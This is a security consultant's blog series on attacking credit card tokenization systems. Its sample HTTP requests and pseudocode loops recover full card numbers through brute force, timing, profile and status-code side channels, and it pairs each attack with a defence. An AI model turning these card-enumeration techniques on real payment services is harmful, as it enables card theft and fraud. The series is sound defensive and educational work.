# Breaking Credit Card Tokenization

Originally published as a series here, here, here, and here.

This is a series of blog posts on the topic of breaking credit card tokenization systems and is the written version of several conference presentations I have given on this subject. This post will address the core terms and history before digging into one of the attacks we have successfully executed against some of our retail clients’ tokenized payment systems. Other attack techniques that we have also successfully executed against clients’ systems will follow in future posts.

Note that none of the attacks discussed in this series are cryptographic attacks on the generation of tokens. Instead, all are attacks against the integration of tokenized payment services with another front-end retail application.

Long before the idea of tokenization came along, PCI-DSS approved the storage of a credit card’s six-digit prefix representing the issuing bank and the credit card’s four-digit suffix. This is called “truncation” in PCI parlance. Essentially, all a merchant needs to eliminate is the middle six digits (six-digit prefix + four-digit suffix = 10 digits), as shown in the figure below:

Computational Complexity of the Middle Six Digits

At first glance, the worst case for brute force guessing the middle six digits from a truncated credit card number appears to be 106 (or 1,000,000) tries. However, credit card numbers implement the Luhn Algorithm (http://en.wikipedia.org/wiki/Luhn_algorithm), also known as the “mod 10” or “modulus 10” algorithm, which uses the last digit in the card number as a check digit. This reduces the potential brute force guesses by an order of magnitude — reducing the worst case to 105 (or 100,000) tries. The average case is 50,000 tries and the best case, of course, is a single lucky guess. Offline brute force attacks of a password with such low computational complexity is a trivial task, but in most credit card tokenization scenarios, brute forcing those middle six digits requires an online attack, which is considerably more difficult.

A common practice with PCI compliant merchants is to reduce PCI scope by eliminating the full 16-digit credit card number from commerce systems, only storing a “token” that represents the credit card. This process is known as “credit card tokenization” in PCI parlance. The ultimate benefit to the merchant is the reduction of PCI compliance scope and risks related to breaching the outward facing point of sale systems.

There are several implementation variants to credit card tokenization. Some tokens are surrogate numbers 16 digits long so that they fit in the same space already allocated to “real” credit cards in legacy point of sale systems. Other tokens are longer, requiring modification of the commerce system to contain them, and can be based on salted cryptographic hashes of the original card number, or just extremely random identifiers.

The most common implementations rely on the full credit card processing and storage capabilities of large payment gateway service providers. However, some larger enterprises have chosen to implement their own payment tokenization systems internally, typically hosted in a DMZ, separated away from the commerce systems to reduce PCI scope. In those scenarios, enterprises have essentially turned a small portion of themselves into tokenized payment gateway service providers and are choice targets for tokenization exploits.

The enterprise “DIY” version is the target of this blog series, although some of the attack techniques could possibly carry over into the commercial tokenization services offered by payment gateways.

Regardless of the architecture, if a full credit card number is transmitted to a system component, that component is IN PCI SCOPE. For almost a decade now, I have explained this as “PCI cooties, you touch it, you’ve got it.” This is important to remember when considering the attacks described in this series.

Malicious Insiders

For the purpose of this blog series, the term “malicious insider” will mean an employee or contractor of the merchant who has access to the front-end retail application, but is unauthorized to access the back-end payment system that contains the full 16 digit Primary Account Numbers (PANs) that correspond with tokens. These insiders may be in system admin, developer, DBA, or similar roles within the merchant and will likely have access to truncated PANs, customer billing information (names, addresses, phones, etc.), and, of course, tokens. They also have the ability to observe the front-end talking to the tokenized systems.

The Ideal Defense Against Malicious Insiders

The ideal defensive position is to implement credit card tokenization such that the malicious insider’s ability to attack is identical with brute forcing truncated PANs. This could entail a malicious insider exfiltrating customer billing information, truncated PANs, and expiration dates, then performing online attempts to place transactions at other merchants. Fifty thousand failed transactions later (on average), perhaps they’ll get the card number right, and perhaps that card will have some available balance for causing damage. However, this is a noisy attack where the payment gateway and the banks will implement their fraud checks.This is a very safe place to be as a tokenized merchant.

The Worst Case Defense Against Malicious Insiders

This worst-case scenario is only applicable to payment gateways exposing a tokenization API, or to those enterprises that run their own centralized instance of a tokenization service internally, and mirrors an engagement with a retail client (names, URLs, and parameters changed to protect the innocent, of course). Suppose an internet-facing commerce application (store.example.com) embeds a call to a web API in a special PCI DMZ that takes a credit card as input similar to this request:

POST /api/generateCcToken HTTP/1.1
Host: payment.example.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 55
{“cc”:”4111111111111111",”expmm”:”12",”expyyyy”:”2017"}

Since this is a tokenization scenario, the user’s browser must make the call directly to the payment server in the tokenization DMZ. If the user’s browser sent this credit card data to the front-end e-commerce application, then that application and its entire hosting environment will have touched PANs and therefore fall into full PCI scope, negating whole the point of tokenization. In the early days of credit card tokenization, the web app silently redirected the browser to a second server to process the credit card, which would provide a mostly seamless customer experience, since users rarely notice that the destination for the credit card form POST is a different server. (Memory lane: back in the IE6 days, this wasn’t so “silent” as the user could hear “click, click, click” sounds as the redirects happened in quick succession.) The payment server would then typically respond with a simple HTML form and JavaScript to auto-submit the tokenized responses back to the original app server when the page loads.

But today, with asynchronous requests and JSON, applications can do this more seamlessly than before. In this case, the request initiated from JavaScript living in the browser, which is available for full introspection by a potential attacker, and the payment server responded with a hash of the credit card. The response looked something like this:

HTTP/1.1 200 OK
Content-Type: application/json

We can assume the hash is concatenated or salted with secret values only a select few may have, so offline attacks are basically pointless. They aren’t impossible, just implausible. Since this call to /api/generateCcToken was on a different server and DNS domain (payment.example.com) in the PCI DMZ, separate from the main application (store.example.com), no authenticated session cookies accompanied it. In other words, all requests to this service were essentially anonymous. Even if front-end application (store.example.com) set its cookies to the parent domain (example.com), the session data could not be shared between the store and payment service, because it blurs the lines of segmentation and likely passes the “PCI cooties” from the payment server to the store. Once the payment server generated the hashes, they lived in a database accessible to business users, through an internal web app, for legitimate sales and customer support reasons. The users could search on name, expiration date, and other transaction metadata, revealing the hashes and truncated PAN. See where this is going yet?

If a malicious insider would target a specific tokenized credit card record, extracting the truncating PANs and metadata, that malicious insider could interrogate the /api/generateCcToken service by iterating through all of the possible 105 permutations of valid credit card numbers that satisfy the Luhn check until the output matches the hash stored in the front-end application’s database. One hundred thousand queries all at once in a row might raise some eyebrows (or it might not, depending upon the monitoring and size of the environment), but 100,000 queries spread out over days or weeks might not, especially if more than one tokenized credit card is targeted, and if multiple source hosts can be used to further anonymize the requests (think: botnet). Since this API call only generates the tokenized credit card record and does not attempt to actually authorize a credit transaction through a payment provider’s merchant account, the bank’s fraud system would never come into play. If the enterprise’s internal tokenization system processes thousands of legitimate requests per day or more, it would be fairly easy for an attacker to “slow burn” the service to harvest the credit cards without detection.

Of course, this is why PCI DSS requirement 3.4 has this nice warning:

Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity’s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.
By correlating hashed and truncated versions of a given PAN, a malicious individual may easily derive the original PAN value. Controls that prevent the correlation of this data will help ensure that the original PAN remains unreadable.

A Better Solution

Normally, in a direct object reference scenario (i.e. the credit card number acts like an insecure direct object reference in this case), encrypting the parameter’s value makes the problem go away, but not in this case. If the credit card number is sent to the front-end e-commerce system for encryption first, then the point of tokenization has been defeated (remember: PCI cooties). If the credit card is encrypted in the user’s browser, then an attacker can simply unravel the JavaScript performing the encryption, steal the key, and incorporate the encryption as part of the attacks.

Consider if the request looked like this:

POST /api/generateCcToken HTTP/1.1
Host: payment.example.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 161
{“authToken”:”VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIEEgcmVhbCBvbmUgd291bGQgYmUgYmV0dGVyLg==”,”cc”:”4111111111111111",”expmm”:”12",”expyyyy”:”2017"}

Assuming that the “authToken” parameter is encrypted with a key that is shared by the front-end e-commerce system and the payment service, and that the decrypted contents contain a unique identifier and some sort of time-to-live value, then the payment server could implement throttling and immediately identify and block bad actors. Essentially, this is a federated authentication solution to the prior problem, and federation is certainly not a novel idea. However, tokenized payment services in large enterprises commonly fail to implement proper hand-off authentication between the services. This solution won’t eliminate all abuse of the tokenization system, but it will considerably reduce its likelihood.

Side Channels

Side channels are unintended ways information can be observed in a system. Attackers can leverage side channels to make software divulge details that developers never intended. For a deeper dive on the subject, look at Shannon’s Information Theory to understand key ideas like entropy and signal-to-noise ratios. In this post, we will dig into a timing side channel attack against credit card tokenization systems.

Timing Side Channel Attacks

Developers are trained from day one to optimize software performance, such as storing only a single copy of data on disk and having the fewest round trips to a server as possible. Credit card tokenization system developers are no different. Why store the same credit card multiple times or query the database an extra time? Like the other attacks from part one of this series, the devil is in the details.

On an engagement of a large retail client, a tokenization service’s response time was observed as being roughly twice as long if the credit card number submitted to the service was brand new (i.e. never seen by the payment server previously). And what was even better: the response time was dependably regular, similar to the following table:

Card Number Response Time Hit or Miss?

This response time data was the result of an algorithm similar to this pseudocode:

hash := sha256(salt + Credit Card)
dbResults := sql(select * from CC if hash=hash)
if (dbResults > 0):
return dbResults[0]
else:
sql(insert into CC (CreditCard))
return hash

This would explain a new card number resulting in longer response times since it would query the database twice. To the attacker, it doesn’t matter why one conditional branch of the software is longer than the other, only that there is a clear signal in the noise. If the attacker can observe that unseen Primary Account Numbers (PANs) have a deterministically distinct response time than PANs already in the system, then an attacker can send in a batch of records and observe the distinctions in response times. Consider this attack as locating a Boolean true/false buried deep in the response time metadata.

Direct Exfiltration with Timing Attacks

Credit card data exfiltration via timing analysis is actually simple to do. The mechanics look a lot like the malicious insider abuse of correlating truncated credit card numbers discussed in the first post in this series- just brute force the service with 16 digit numbers that pass the Luhn check and set the stopwatch. Some environmental conditions may come into play, such as peak business times or maybe a node in the load balancer pool with degraded or damaged disks (anyone with a background in load testing would be very well adapted to pull off these types of attacks). Automation would look something like the following pseudo-code:

def findPan(truncatedPan, token):
pans = generatePansFromTruncation(truncatedPan)
foreach pan in pans:
resultMS = timeTokenPost(pan)
if (resultMS < 150):
return pan
return

It is important to note that this type of data exfiltration using solely the timing of the responses as the signal of a “legit” versus “not legit” credit card cannot provide the attacker with all of the details he needs to carry out fraud. The attacker still needs the billing address, which a malicious insider would have.

Using Timing Analysis to Validate Stolen Credit Cards

Another use for this type of attack is to perform QA checks on the most recent batches of breached credit card numbers floating around the darker parts of the web after a major retailer’s breach. So if an attacker steals credit card data from brick-and-mortar retailer A, it may be possible for a sufficient overlap in the customer base at online retailer B to validate the banks haven’t reissued the credit cards a couple months after the initial breach. Retailer B might want to wash their hands of any responsibility, citing retailer A’s initial breach, but retailer B didn’t do its customers any favors by having a timing side channel defect in in their credit card tokenization system.

Preventing Timing Attacks

Preventing timing attacks has a simple goal: make the response times of both code paths (credit card is already stored in the tokenization system versus new credit card) as indistinguishable as possible. This means developers need to unlearn what they learned in their very first programming class (and probably every class since): introduce intentional inefficiencies into the faster code path. Some developers may choose to create an arbitrary load (such as performing arithmetic operations) or introduce a sleep() call for a random amount of time nearly identical to average response time delta. However, a great solution (that DBAs won’t like) is to query the database the same number of times on both code paths, like this:

hash := sha256(salt + Credit Card)
dbResults := sql(select * from CC if hash=hash)
if (dbResults > 0):
sql(select * from CC if hash=hash) //an extra db call
return dbResults[0]
else:
sql(insert into CC (CreditCard))
return hash

Input/Output (I/O) is the slowest link and is dependent upon the environment. Introducing a hardcoded sleep() call may work for specific times of day, but if the database is slower or faster one day due to peak load or perhaps after an infrastructure upgrade, then the distinguishable side channel timing attack will return.

My Profile Side Channel Attacks

Many commerce apps — especially ones using credit card tokenization — implement a “My Profile” type feature in which the customer can save a form of payment for future reuse. If an attacker can take over a customer’s account or session (e.g. by stealing credentials or if the application switches between HTTP and HTTPS with the same session cookies making MITM possible), then the attacker can browse to the “My Saved Credit Cards” page, observe truncated PAN data, and then proceed to add new credit cards to the user account’s profile, analyzing the responses.

For example, suppose Alice, a user on the e-commerce site, has three saved credit cards in her user profile, and an attacker who has stolen her session or credentials can observe the following:

This metadata is not quite as helpful as the data a malicious insider above may have, but it is still enough to hone in on specific attacks. All of the potential credit card prefixes for Visa, MasterCard, and American Express are open source knowledge for a given target country. An attacker can use this information to generate a list of potential PANs that match this very truncated version, and, one at a time, attempt to add them to Alice’s profile. If a fourth payment method is on the list, then the attacker did not discover one of Alice’s credit cards. However, if the number of payment methods stays the same, then the attacker just discovered one of Alice’s credit cards. The following pseudo-code illustrates the algorithm (award bonus points for deleting the bogus credit card that didn’t match what the application already had in the database):

def findPan(truncatedPan):
pans = generatePansFromTruncation(truncatedPan)
count = countCCsInProfile()
foreach pan in pans:
newCount = countCCsInProfile()
if (count == newCount):
return pan // Hit!
else:
removeCcFromProfile(pan)
return

Behind the scenes, this is another example of developers doing what they are trained to do: be efficient. If a credit card tokenization record already exists, then adding a duplicate violates the efficiency rules developers are taught. Thus, another side channel attack is discovered.

Preventing My Profile Attacks

The fix to this, like the fix in the second post in this series, is to intentionally introduce some inefficiency in the application in lieu of creating a mechanism to extract a Boolean true/false response whether a credit card already exists. A suggestion we often provide to developers is to return a new payment method ID or token even if the credit card matches a record already in the database.

Some developers who really like REST can be downright fanatical about RESTful design requirements, splitting hairs over whether a particular implementation is truly RESTful or not. Many large development teams have at least one of these “RESTful service geeks” (my moniker for them), but do not let them design your RESTful credit card tokenization service. Consider the following tokenization request from above:

POST /api/generateCcToken HTTP/1.1
Host: fakeretailpaymentprovider.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 161
{“authToken”:”VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIEEgcmVhbCBvbmUgd291bGQgYmUgYmV0dGVyLg==”,”cc”:”4111111111111111",”expmm”:”12",”expyyyy”:”2017"}

A RESTful service geek will instruct developers that HTTP status codes should be very distinct. For example, the service might return the following response:

HTTP/1.1 201 Created
Content-Type: application/json
[…snip…]

Or perhaps this:

HTTP/1.1 202 Accepted
Content-Type: application/json
[…snip…]

Something as small as “201” versus “202” can indicate a world of contextual difference. An attacker will likely learn that “201 Created” means the credit card in the tokenization request has not previously been seen by the tokenization system, so the system created a brand new credit card token record for it. Likewise, an attacker might decipher “202 Accepted” as an indication that the credit card already exists on the system. Or perhaps there are custom HTTP headers that are added or updated on the service’s response (which may especially be true if the service is designed for the consumption by a mobile application where developers think nobody will ever be able to see those headers). Any of these can be enough of a signal, no matter how subtle — just take the blinders off and look carefully at every detail. We have seen this attack’s cousin for years now: web applications that are kind enough to tell us if a user account already exists at registration or during an attempt to remember a user ID or password.

This insight, coupled with the scenarios already presented in this series where an attacker may know truncated PANs and billing information, can also lead to credit card exfiltration.

Successful applications will always respond the same way regardless of the internal differences. It’s boring and probably doesn’t comply with all of the RESTful principles, but at the same time it protects knowledge of the presence of certain credit cards stored in the system. The following is a nice safe response:

HTTP/1.1 200 OK
Content-Type: application/json
[…snip…]

Careless Transmission of Credit Cards

Remember that the main point of credit card tokenization is to keep PANs (Primary Account Numbers) out of the main application-hosting environment. Merchants accomplish this by transmitting the PAN from the customer’s browser directly to a tokenization server in a special PCI DMZ where the litany of expensive and restricted PCI controls is fully applicable. Keeping the PAN out of the hosting environment minimizes costs and restrictions on the main application’s hosting environment, which is why anyone would want to implement tokenization (ahem, cough … of course it also reduces risk, right?). However, in my experience with multiple client engagements (and admittedly even once or twice in a past life as a developer integrating e-commerce applications against payment service gateway’s tokenization APIs), subtle code flaws have allowed the PANs to accidentally get transmitted to the application server.

ASP.NET Web Forms

Almost as a routine, assessments of commerce systems written in ASP.NET Web Forms present this issue, especially if tokenization was not in its original feature set. Web Forms keeps the developer abstracted a layer or two away from the bare metal of the web (which is why Microsoft created ASP.NET MVC), and the use of “controls” to promote code reuse can result in forgotten or unexpected behavior. Requests from web control validators, partial update panels and other AJAX-ish ASP.NET controls can generate events that require round-trips to the server, like this request, for example, which I captured from an actual production commerce system (and sanitized):

POST /CreditCardPayment.aspx?c29tZXBhcnRpYWx1cGRhdGVzdHJpbmdnb2VzaGVyZS1rdWRvc3RveW91Zm9yZGVjb2Rpbmd0aGlzIQ== HTTP/1.1
Host: somefakeretailer.com:443
Connection: keep-alive
Content-Length: 3265
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
[…snip…]

ScriptManager1=upCcNumber&txtboxfname=Tim&cardNumber=4111111111111111&securityCodeNumber=123&txtboxlname=MalcomVetter&ddlExpMM=01&ddlExpYYYY=2017[…snip…]

In the above example, the developers did not realize it was happening, and the application server was not persisting the credit card numbers, but the numbers were transmitted to the application server, which technically ruins the point of tokenization. (It also exposes the application to additional attacks, as we will discuss later.) The solution is not to mix any controls that make __doPostBack() calls on the same pages that present payment forms. In the .NET developer community, there are humorous T-shirts that sum this up quite well. Here is one example:

Some clever developers attempted to mix and match these types of controls on payment forms by inserting their own JavaScript to purge the values of the credit card numbers on the post back events before data is sent to the server. Anyone who has spent any time with ASP.NET Web Forms, nesting complicated controls, knows firsthand that DOM IDs for these fields can be very complicated:

ctl00_ContentPlaceHolder1_TextBox3

These IDs can be changed with any upstream code checked in by another developer on the same team later. As a result, this type of approach is like walking on eggshells made out of JavaScript, especially if your QA team does not specifically check for this JavaScript sanitization before each release.

Card Type Prefix Fetching

Another common example of careless transmission of credit card data in web apps is the predetermination of card types on payment detail forms. For example, we observed the following request taking the onkeypress events from a credit card text field and sending them in JSON to the server so that the card type drop down list box could be dynamically filled in:

POST /api/ccType HTTP/1.1
Host: fakeretailpaymentprovider.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 55
{“ccPrefix”:”41111111"}

The first key press event generated a post similar to the above with a “ccPrefix” of “4” followed by “41” then “411” and so on. It was immediately apparent that the JavaScript logic was flawed and would result in the first 15 digits of the full 16-digit number (or close to it depending on if the user typed faster than the JavaScript could execute its next pass) being sent to the application server. The developers probably thought they were saving their customer a couple clicks on the card type drop down box, but would have been better served leaving the card type drop down off the payment form entirely, instead implementing the card type lookup logic on the server side. In general, latching onto events like onkeypress generates behavior that is slightly different per browser or even browser add-ons. For example, a saved credit card number that is automatically pasted into the form by a browser’s credit card e-wallet may not even trigger the onkeypress event at all.

Form Tags and Other JavaScript Bugs

Another tokenization implementation flaw that can be found during deep scrutiny is a set of <form> tags with an “action” that is intended to be modified to by JavaScript at runtime in the browser to point to the tokenization server. This is similar to the ASP.NET web controls issue above but is in applications built on many development platforms, like Java, PHP, etc. To do tokenization correctly (as stated numerous times above, but here it comes once more), the client-side has to behave as expected. It must send the credit card details to the tokenization service and not to the main commerce application server for any reason.

Since the browser must behave, the JavaScript powering the browser must behave, and all the platform-specific behavioral nuances must be considered completely by the developers. If a customer’s browser generates an exception in the JavaScript which causes the logic to fall out of the function that switches the <form> tag’s action, then that customer’s browser will be sending PANs to the application server, like it or not. Even more dangerous is linking to hosted JavaScript libraries on different domains, since a Man-In-The-Middle or even a timeout to fetch those libraries can cause unanticipated logic flaws.

Scraping the RAM of Web Servers

It’s common knowledge that attackers breach point-of-sale (POS) systems by scraping RAM for credit card data, searching for regular expressions that match PANs and even full magnetic stripe data as a post-exploitation activity (after attackers gain an initial foothold into the systems). This is possible because of the architecture — the POS systems have to have a copy of PANs in memory for at least a brief amount of time. It’s not often remembered, but the same is true for any web server that receives a PAN as a web request — even if that request was submitted over HTTPS, encoded as JSON, form-urlencoded, XML, etc., the server will have a plaintext copy in RAM temporarily — ripe for RAM scraping.

With a foothold into the servers hosting the commerce application, an attacker can scrape RAM to harvest credit card data that was sent to the server, whether sent erroneously or not. If the application is built in Java or .NET (or other languages with immutable strings) the persistence of these little credit card gems in memory increases considerably and would not require repeated real-time scraping. On a high-volume commerce app, if even 5–10 percent of the transactions erroneously transmitted credit card data back to the main app servers, there would be more than sufficient economic incentive for an attacker to hang out and pick up a copy of this low-hanging fruit.

Was It a DevOps Accident?

As seen in this post, even a subtle flaw could result in the accidental transmission of credit card data back to the commerce server, which could end up in debug logs, core dumps, or just scraped from RAM. With DevOps, organizations now have much more code savvy individuals supporting their continuous delivery deployments. With JavaScript heavy apps, a full build (compilation) of the application is not necessary to introduce unwanted changes to the application’s logic. It is common for merchants to have layers of controls around the build automation — who introduced what code changed and when, but once that code is released to the DevOps team to maintain in the production environment, what file integrity controls are monitoring for changes in the JavaScript? From my experience as a developer and a consultant, rarely do organizations watch the content of .js files. Introducing and reverting a malicious change in JavaScript by a developer-minded admin gone rogue would be easy to accomplish with just a simple text editor on the server (think: means, motive, opportunity).

Exfiltration of PANs by a malicious member of a DevOps team is also plausible. “I saw some performance issues, so I am profiling some processes, which may generate some process dumps or debug logs on the commerce app servers.” If ever there was a possibility for a malicious insider to pull off a “salami slicing” attack, this is it. Unfortunately, penetration tests where the tester gets to pretend to be a build and release engineer are very rare.

Recap

Commerce applications that integrate with credit card tokenization systems, especially enterprise-specific systems, are not automatically immune from attacks, no matter what your PCI QSA or maybe even your payment gateway service provider says. Like anything else, the devil is in the details, so resist the binary response of, “We do tokenization, therefore, we are safe.” Mature organizations that care about managing risk will go beyond the PCI minimum required testing and bring in experts that understand these attack vectors, and carefully analyze their payment systems with a fine-tooth comb.